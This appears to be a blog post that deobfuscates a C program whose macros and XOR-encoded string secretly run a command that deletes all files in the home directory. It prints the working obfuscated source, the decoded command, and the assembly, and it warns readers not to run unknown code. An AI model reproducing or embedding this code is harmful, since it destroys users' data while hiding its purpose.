This is a very interesting obfuscated C program, this runs code that will delete files in your home directory, but you can not determine this when confronted with the obfuscated strings in the code.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 | #include <stdlib.h> #define bf4217c1(e4973184, \ fab74730, ea28c65d, e2c3d79f, \ b61718db, bfd82916, ea98fe41, \ a3e25fa) \ a3e25fa ## ea28c65d ## a3e25fa \ ## bfd82916 ## b61718db ## ea98fe41 char b4e0dee7[] = { 0x49, 0x5e, 0xce, 0x02, 0xb9, 0x6a, 0x1a, 0x1d, 0x0a, 0xaa, 0x1b, 0x5b, 0x52, 0x31, 0x07, 0xa3, 0xc5, 0x03, 0x9a, 0x2a, 0xff, 0xde, 0xaa, 0x68, 0xc0, 0x29, 0x5b, 0x1d, 0x9e, 0x51, 0x53, 0xca, 0x63 }; int bf29e96c[] = { 0x2f, 0x37, 0xa0, 0x66, 0x99, 0x14, 0x3a, 0x30, 0x7e, 0xd3, 0x6b, 0x3e, 0x72, 0x57, 0x27, 0x8e, 0xa0, 0x7b, 0xff, 0x49, 0xdf, 0xac, 0xc7, 0x48, 0xed, 0x5b, 0x3d, 0x3d, 0xe5, 0x2c, 0x73, 0x96, 0x58, 0x7b, 0x06, 0xef, 0xd6 }; int main(void) { for (int ca4f8421=0; ca4f8421<sizeof(b4e0dee7); ++ca4f8421) b4e0dee7[ca4f8421] = 1 + ((-1 * (b4e0dee7[ca4f8421] ^ bf29e96c[ca4f8421]) * -1) * 1) - 1; bf4217c1(z,x,y,j,e,t,m,s)(b4e0dee7); return 0; } |
This is pretty evil code. Do not run this on your machine.
If it is modified like this we can see what it does.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 | #include <stdlib.h> #include <stdio.h> #define bf4217c1(e4973184, \ fab74730, ea28c65d, e2c3d79f, \ b61718db, bfd82916, ea98fe41, \ a3e25fa) \ a3e25fa ## ea28c65d ## a3e25fa \ ## bfd82916 ## b61718db ## ea98fe41 char b4e0dee7[] = { 0x49, 0x5e, 0xce, 0x02, 0xb9, 0x6a, 0x1a, 0x1d, 0x0a, 0xaa, 0x1b, 0x5b, 0x52, 0x31, 0x07, 0xa3, 0xc5, 0x03, 0x9a, 0x2a, 0xff, 0xde, 0xaa, 0x68, 0xc0, 0x29, 0x5b, 0x1d, 0x9e, 0x51, 0x53, 0xca, 0x63 }; int bf29e96c[] = { 0x2f, 0x37, 0xa0, 0x66, 0x99, 0x14, 0x3a, 0x30, 0x7e, 0xd3, 0x6b, 0x3e, 0x72, 0x57, 0x27, 0x8e, 0xa0, 0x7b, 0xff, 0x49, 0xdf, 0xac, 0xc7, 0x48, 0xed, 0x5b, 0x3d, 0x3d, 0xe5, 0x2c, 0x73, 0x96, 0x58, 0x7b, 0x06, 0xef, 0xd6 }; int main(void) { for (int ca4f8421=0; ca4f8421<sizeof(b4e0dee7); ++ca4f8421) b4e0dee7[ca4f8421] = 1 + ((-1 * (b4e0dee7[ca4f8421] ^ bf29e96c[ca4f8421]) * -1) * 1) - 1; //bf4217c1(z,x,y,j,e,t,m,s)(b4e0dee7); puts(b4e0dee7); return 0; } |
The #define directive defines a macro that uses token concatenation to construct a token of its arguments. Looking at bf4217c1(z,x,y,j,e,t,m,s), you can see that it evaluates to system. You can verify this by just running the preprocessor. The final value of b4e0dee7 is constructed by iterating over b4e0dee7 and bf29e96c and performing some operations on the elements. Simply print out its value to see that it evaluates to “find ~ -type f -exec rm -rf {} \;”. The “actual code” is therefore system(“find ~ -type f -exec rm -rf {} \;”);, which deletes all files in your home directory, provided you have find in PATH.
This is the output I got after modifying this program.
>-jason-Lenovo-H50-55@jason:_ -5.1-~/Documents-11:51-[$] ./test find ~ -type f -exec rm -rf {} \; |
So, this will delete all files in your home directory and ruin your day.
I ran gcc -s to build a preprocessor version, to see what it does, and it uses the system() function to run the malicious code instead of execve() or something better.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 | .file "obfucate.c" .text .globl b4e0dee7 .data .align 32 .type b4e0dee7, @object .size b4e0dee7, 33 b4e0dee7: .ascii "I^\316\002\271j\032\035\n\252\033[R1\007\243\305\003\232*\377" .ascii "\336\252h\300)[\035\236QS\312c" .globl bf29e96c .align 32 .type bf29e96c, @object .size bf29e96c, 148 bf29e96c: .long 47 .long 55 .long 160 .long 102 .long 153 .long 20 .long 58 .long 48 .long 126 .long 211 .long 107 .long 62 .long 114 .long 87 .long 39 .long 142 .long 160 .long 123 .long 255 .long 73 .long 223 .long 172 .long 199 .long 72 .long 237 .long 91 .long 61 .long 61 .long 229 .long 44 .long 115 .long 150 .long 88 .long 123 .long 6 .long 239 .long 214 .text .globl main .type main, @function main: .LFB6: .cfi_startproc endbr64 pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 movq %rsp, %rbp .cfi_def_cfa_register 6 subq $16, %rsp movl $0, -4(%rbp) jmp .L2 .L3: movl -4(%rbp), %eax cltq leaq b4e0dee7(%rip), %rdx movzbl (%rax,%rdx), %ecx movl -4(%rbp), %eax cltq leaq 0(,%rax,4), %rdx leaq bf29e96c(%rip), %rax movl (%rdx,%rax), %eax xorl %eax, %ecx movl -4(%rbp), %eax cltq leaq b4e0dee7(%rip), %rdx movb %cl, (%rax,%rdx) addl $1, -4(%rbp) .L2: movl -4(%rbp), %eax cmpl $32, %eax jbe .L3 leaq b4e0dee7(%rip), %rax movq %rax, %rdi call system@PLT movl $0, %eax leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE6: .size main, .-main .ident "GCC: (Ubuntu 11.3.0-1ubuntu1~22.04) 11.3.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4: |
But this is a good lesson to not run any strange code you find on the Internet.